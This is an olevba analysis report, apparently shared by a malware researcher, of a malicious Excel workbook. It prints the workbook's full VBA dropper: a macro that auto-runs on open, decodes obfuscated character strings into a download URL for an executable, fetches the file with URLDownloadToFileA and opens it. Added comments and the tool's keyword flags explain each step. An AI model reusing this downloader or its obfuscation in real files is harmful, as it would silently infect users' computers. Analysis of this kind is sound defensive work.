dynamoo

Malicious Excel macro

Mar 11th, 2015
  1. olevba 0.25 - http://decalage.info/python/oletools
  2. Flags       Filename                                                        
  3. ----------- -----------------------------------------------------------------
  4. OLE:MAS---- 201503071457.xls
  5.  
  6. (Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
  7.  
  8. ===============================================================================
  9. FILE: 201503071457.xls
  10. Type: OLE
  11. -------------------------------------------------------------------------------
  12. VBA MACRO ЭтаКнига.cls
  13. in file: 201503071457.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/\u042d\u0442\u0430\u041a\u043d\u0438\u0433\u0430'
  14. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  15. Sub Workbook_Open()
' Auto-exec entry point: Excel runs this when the workbook is opened (the AutoExec row in the
' ANALYSIS table below). Its only action is to call atqk_x482mp6v, defined in the second .bas
' module further down in this report.
  16. atqk_x482mp6v
  17. End Sub
  18. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  19. ANALYSIS:
  20. +----------+---------------+----------------------------------------+
  21. | Type     | Keyword       | Description                            |
  22. +----------+---------------+----------------------------------------+
  23. | AutoExec | Workbook_Open | Runs when the Excel Workbook is opened |
  24. +----------+---------------+----------------------------------------+
  25. -------------------------------------------------------------------------------
  26. VBA MACRO Лист1.cls
  27. in file: 201503071457.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/\u041b\u0438\u0441\u04421'
  28. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  29. (empty macro)
  30. -------------------------------------------------------------------------------
  31. VBA MACRO Лист2.cls
  32. in file: 201503071457.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/\u041b\u0438\u0441\u04422'
  33. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  34. (empty macro)
  35. -------------------------------------------------------------------------------
  36. VBA MACRO Лист3.cls
  37. in file: 201503071457.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/\u041b\u0438\u0441\u04423'
  38. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  39. (empty macro)
  40. -------------------------------------------------------------------------------
  41. VBA MACRO Class1.cls
  42. in file: 201503071457.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Class1'
  43. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  44. (empty macro)
  45. -------------------------------------------------------------------------------
  46. VBA MACRO Class2.cls
  47. in file: 201503071457.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Class2'
  48. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  49. (empty macro)
  50. -------------------------------------------------------------------------------
  51. VBA MACRO АавпавпАА.bas
  52. in file: 201503071457.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/\u0410\u0430\u0432\u043f\u0430\u0432\u043f\u0410\u0410'
  53. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  54.  
  55. Public Function tIBlTVqSYlvQeRDfBAc(VdkAbaqgjbz As String) As String
' String de-obfuscation helper used by the routines in the second .bas module below: the loop
' steps through the input two characters at a time and keeps only positions 1, 3, 5, ..., so
' every second Chr$() value in the callers is discarded padding. HFncwnerBk is never declared
' (no Dim or Option Explicit is visible in this module), so it is an implicit Variant.
  56. For HFncwnerBk = 1 To Len(VdkAbaqgjbz) Step 2
  57. tIBlTVqSYlvQeRDfBAc = tIBlTVqSYlvQeRDfBAc & Mid(VdkAbaqgjbz, HFncwnerBk, 1)
  58. Next
  59. End Function
  60.  
  61. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  62. ANALYSIS:
  63. No suspicious keyword or IOC found.
  64. -------------------------------------------------------------------------------
  65. VBA MACRO Class3.cls
  66. in file: 201503071457.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Class3'
  67. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  68. (empty macro)
  69. -------------------------------------------------------------------------------
  70. VBA MACRO Class4.cls
  71. in file: 201503071457.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Class4'
  72. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  73. (empty macro)
  74. -------------------------------------------------------------------------------
  75. VBA MACRO Class5.cls
  76. in file: 201503071457.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Class5'
  77. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  78. (empty macro)
  79. -------------------------------------------------------------------------------
  80. VBA MACRO ываываААва.bas
  81. in file: 201503071457.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/\u044b\u0432\u0430\u044b\u0432\u0410\u0410\u0432\u0430'
  82. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  83. #If VBA7 Then
'     Imports URLDownloadToFileA from urlmon.dll under a mojibake-named alias; the VBA7 branch
'     uses LongPtr so the declaration also loads in 64-bit Office, the #Else branch is the
'     legacy 32-bit form with Long. This is the download primitive the ANALYSIS table flags
'     below ("May download files from the Internet").
  84.     Private Declare PtrSafe Function ãøÏÍØûâàà Lib "urlmon" Alias _
  85.     "URLDownloadToFileA" (ByVal BHGBkjsdfF As LongPtr, _
  86.     ByVal ÏÑðïñïñïïÎàï As String, _
  87.     ByVal ÏÑðïñïñïïÎàïf As String, _
  88.     ByVal ÏÑðïñïñïïÎàïfd As Long, _
  89.     ByVal ÏÑðïñïñïïÎàïfds As LongPtr) As LongPtr
  90. #Else
  91.     Private Declare Function ãøÏÍØûâàà Lib "urlmon" Alias _
  92.     "URLDownloadToFileA" (ByVal BHGBkjsdfF As Long, _
  93.     ByVal ÏÑðïñïñïïÎàï As String, _
  94.     ByVal ÏÑðïñïñïïÎàïf As String, _
  95.     ByVal ÏÑðïñïñïïÎàïfd As Long, _
  96.     ByVal ÏÑðïñïñïïÎàïfds As Long) As Long
  97. #End If
  98. Sub atqk_x482mp6v()
' Called from Workbook_Open. Every argument is a Chr$() sequence passed through
' tIBlTVqSYlvQeRDfBAc (the odd-position decoder in the previous module): the first becomes the
' URL argument of the urlmon import, the second is Environ(<decoded variable>) & <decoded file
' name>, i.e. the local download path. Decoding these offline (keep every second character)
' recovers the network IoC and the drop path without running the macro.
  99.  
  100. ðïîðïÀàâïàâï tIBlTVqSYlvQeRDfBAc(Chr$(104) & Chr$(133) & Chr$(116) & Chr$(63) & Chr$(116) & Chr$(125) & Chr$(112) & Chr$(37) & Chr$(58) & Chr$(74) & Chr$(47) & Chr$(90) & Chr$(47) & Chr$(70) & Chr$(107) & Chr$(131) & Chr$(111) & Chr$(121) & Chr$(115) & Chr$(123) & Chr$(99) & Chr$(119) & Chr$(104) & Chr$(129) & Chr$(117) & Chr$(100) & Chr$(100) & Chr$(87) & Chr$(117) & Chr$(101) & Chr$(46) & Chr$(59) & Chr$(104) & Chr$(110) & Chr$(111) & Chr$(82) & Chr$(109) & Chr$(113) & Chr$(101) & Chr$(120) & Chr$(112) & Chr$(126) & Chr$(97) & Chr$(110) & Chr$(103) & Chr$(58) & Chr$(101) & Chr$(114) & Chr$(46) & Chr$(73) & Chr$(116) & Chr$(42) & Chr$(45) & Chr$(134) & Chr$(111) & Chr$(112) & Chr$(110) & Chr$(51) _
  101. & Chr$(108) & Chr$(133) & Chr$(105) & Chr$(115) & Chr$(110) & Chr$(42) & Chr$(101) & Chr$(62) & Chr$(46) & Chr$(129) & Chr$(100) & Chr$(128) & Chr$(101) & Chr$(103) & Chr$(47) & Chr$(77) & Chr$(106) & Chr$(129) & Chr$(115) & Chr$(72) & Chr$(47) & Chr$(97) & Chr$(98) & Chr$(124) & Chr$(105) & Chr$(88) & Chr$( _
  102. 110) & Chr$(122) & Chr$(46) & Chr$(95) & Chr$(101) & Chr$(103) & Chr$(120) & Chr$(52) & Chr$(101) & Chr$(130)), Environ(tIBlTVqSYlvQeRDfBAc(Chr$(84) & Chr$(96) & Chr$(77) & Chr$(109) & Chr$(80) & Chr$(123))) & tIBlTVqSYlvQeRDfBAc(Chr$(92) & Chr$(81) & Chr$(102) & Chr$(106) & Chr$(74) & Chr$(105) & Chr$(67) & Chr$(36) & Chr$(104) & Chr$(43) & Chr$(106) & Chr$(48) & Chr$(102) & Chr$(132) & Chr$(103) & Chr$(80) & Chr$(68) & Chr$(109) & Chr$(54) & Chr$(95) & Chr$(55) & Chr$(65) & Chr$(53) & Chr$(130) & Chr$(101) & Chr$(134) & Chr$(68) & Chr$(74) & Chr$(84) & Chr$(129) & Chr$(85) & Chr$(37) & Chr$(46) & Chr$(64) & Chr$(101) & Chr$(57) & Chr$(120) & Chr$(124) & Chr$(101) & Chr$(50))
  103. End Sub
  104. Function ðïîðïÀàâïàâï(z0ktwRXRQZl2qo0_ As String, d4ok1z1Z0N As String) As Boolean
' Download-then-open stage. Calls the urlmon import with (URL, local path); the result is stored
' in an undeclared variable and never checked, so a failed download is not detected. It then
' instantiates an automation object from a decoded ProgID and calls .Open on
' Environ(<var>) & <file name>, a path built the same way as the download target in
' atqk_x482mp6v. The return value is never assigned, so the function always returns False.
  105. ïëðïÀÀàâïï = ãøÏÍØûâàà(0&, z0ktwRXRQZl2qo0_, d4ok1z1Z0N, 0&, 0&)
  106. Set ûâàÀÀâûàûâà = CreateObject(tIBlTVqSYlvQeRDfBAc(Chr$(83) & Chr$(99) & Chr$(104) & Chr$(99) & Chr$(101) & Chr$(52) & Chr$(108) & Chr$(68) & Chr$(108) & Chr$(92) & Chr$(46) & Chr$(46) & Chr$(65) & Chr$(84) & Chr$(112) & Chr$(44) & Chr$(112) & Chr$(91) & Chr$(108) & Chr$(125) & Chr$(105) & Chr$(75) & Chr$(99) & Chr$(125) & Chr$(97) & Chr$(47) & Chr$(116) & Chr$(35) & Chr$(105) & Chr$(71) & Chr$(111) & Chr$(38) & Chr$(110) & Chr$(82)))
  107.  
  108. ûâàÀÀâûàûâà.Open Environ(tIBlTVqSYlvQeRDfBAc(Chr$(84) & Chr$(51) & Chr$(77) & Chr$(71) & Chr$(80) & Chr$(83))) & tIBlTVqSYlvQeRDfBAc(Chr$(92) & Chr$(75) & Chr$(102) & Chr$(98) & Chr$(74) & Chr$(130) & Chr$(67) & Chr$(59) & Chr$(104) & Chr$(73) & Chr$(106) & Chr$(76) & Chr$(102) & Chr$(94) & Chr$(103) & Chr$(40) & Chr$(68) & Chr$(130) & Chr$(54) & Chr$(87) & Chr$(55) & Chr$(90) & Chr$(53) & Chr$(53) & Chr$(101) & Chr$(65) & Chr$(68) & Chr$(102) & Chr$(84) & Chr$(118) & Chr$(85) & Chr$(97) & Chr$(46) & Chr$(58) & Chr$(101) & Chr$(49) & Chr$(120) & Chr$(50) & Chr$(101) & Chr$(47))
  109. End Function
  110.  
  111.  
  112.  
  113.  
  114.  
  115. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  116. ANALYSIS:
  117. +------------+--------------------+-----------------------------------------+
  118. | Type       | Keyword            | Description                             |
  119. +------------+--------------------+-----------------------------------------+
  120. | Suspicious | CreateObject       | May create an OLE object                |
  121. | Suspicious | Lib                | May run code from a DLL                 |
  122. | Suspicious | Open               | May open a file                         |
  123. | Suspicious | Environ            | May read system environment variables   |
  124. | Suspicious | Chr                | May attempt to obfuscate specific       |
  125. |            |                    | strings                                 |
  126. | Suspicious | URLDownloadToFileA | May download files from the Internet    |
  127. +------------+--------------------+-----------------------------------------+